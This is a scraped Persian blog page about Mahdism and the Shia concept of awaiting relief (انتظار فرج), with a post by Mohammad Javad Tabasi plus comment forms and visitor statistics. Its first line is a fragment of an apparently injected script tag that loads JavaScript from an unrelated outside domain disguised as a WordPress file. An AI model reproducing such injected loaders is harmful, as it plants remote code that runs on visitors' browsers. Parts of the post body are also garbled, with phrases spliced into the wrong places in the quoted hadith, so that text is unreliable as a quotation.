script type=’text/javascript’ src=’http://taklearn.ir/wp-includes/js/l10n.js?ver=20101110′> انتظار فرج .
منجی عشق
این وبلاگ قصد دارد شما را با موضوع مهدویت بیشتر آشنا کند
دو شنبه 28 شهريور 1390برچسب:انتظار فرج ,انتظار فرج ,, :: 7:43 ::  نويسنده : زارعی

انتظار فرج

 

يكي از شرايط حضوردر حكومت بقية الله و توفيق ديدار با آن حضرت، انتظار فرج است؛ يعني آمادگي كامل مبارزه با افكار انحرافي و فساد اخلاقي و در يك كلام انتظار فرج يعني بيزاري از دشمنان خدا و پيامبر (صل الله علیه و آله و سلم) و معصومين(علیه السلام) . بي‌سبب نيست كه انتظار از بهترين اعمال شمرده شده است، بلكه فرد منتظِر دولت مهدي همانند كسي است كه در پيش روي رسول خدا (صل الله علیهشهيد گش و آله و سلم) ته و در خون خود غلتيده است و اگر بر همان حالت انتظار از دنيا برود، بسان كسي است كه در خيمه مهدي فاطمه  (علیه السلام) مي‌باشد.
ابو بصير از امام صادق (علیه السلام) روايت كرده است كه آن حضرت روزي فرمود: آيا شما را خبر ندهم از چيزي كه خداوند عملي را بدون آن از بندگانش نمي‌پذيرد؟ گفتيم: آري. فرمود: شهادت بر يگانگي خدا و رسالت پيامبر(صل الله علیه و آله و سلم)  و اقرار به آنچه كه خداوند فرموده، از دوستي ما و بيزاري از دشمنان و اطاعت و پيروي از ما و نيز داشتن ورع، پرهيزكاري و انتظار كشيدن براي قائم‌ (علیه السلام) ، آن‌گاه فرمود: به درستي كه براي ما دولتي است كه خداوند آن را هر زمان كه اراده كند، برقرار مي‌سازد؛ سپس افزود: هر كسي كه دوست دارد از ياران قائم (علیه السلام) ما باشد، بايد در انتظار به براي پذيرش حكومت حق و آراستن به آنچه حضرت مهدي (علیه السلام) مي‌گويد و مي‌خواهد. انتظار فرج يعني نفي هرگونه سلطه از بيگانگان و  سر برد و خود را به ورع و محاسن اخلاق بيارايد، و اگر در همان حال بميرد، براي او اجري همانند كسي است كه آن حضرت را درك كرده باشد.

 

نوشته محمد جواد طبسی

 


نظرات شما عزیزان:

نام :
آدرس ایمیل:
وب سایت/بلاگ :
متن پیام:
:) :( ;) :D
;)) :X :? :P
:* =(( :O };-
:B /:) =DD :S
-) :-(( :-| :-))
نظر خصوصی

 کد را وارد نمایید:

 

 

 

عکس شما

آپلود عکس دلخواه:





درباره وبلاگ

چه با شکوه است تصویر ایامی که تنها حاکم عالم، دادگستری چون قائم آل محمد(عج) باشد. و چه زیباست زندگی در ایامی که پرچمی جز پرچم توحید به اهتزاز نباشد و ندائی جز ندای حق به گوش جهانیان نرسد، دورانی سرشار از عطوفت، مهربانی، عدالت، آزادگی و کرامت انسانی.
موضوعات
پيوندها

تبادل لینک هوشمند
برای تبادل لینک  ابتدا ما را با عنوان منجی عشق و آدرس monjieeshgh.LoxBlog.ir لینک نمایید سپس مشخصات لینک خود را در زیر نوشته . در صورت وجود لینک ما در سایت شما لینکتان به طور خودکار در سایت ما قرار میگیرد.





نويسندگان


ورود اعضا:

نام :
وب :
پیام :
2+2=:
(Refresh)

خبرنامه وب سایت:





آمار وب سایت:  

بازدید امروز : 6
بازدید دیروز : 0
بازدید هفته : 161
بازدید ماه : 254
بازدید کل : 33023
تعداد مطالب : 50
تعداد نظرات : 14
تعداد آنلاین : 1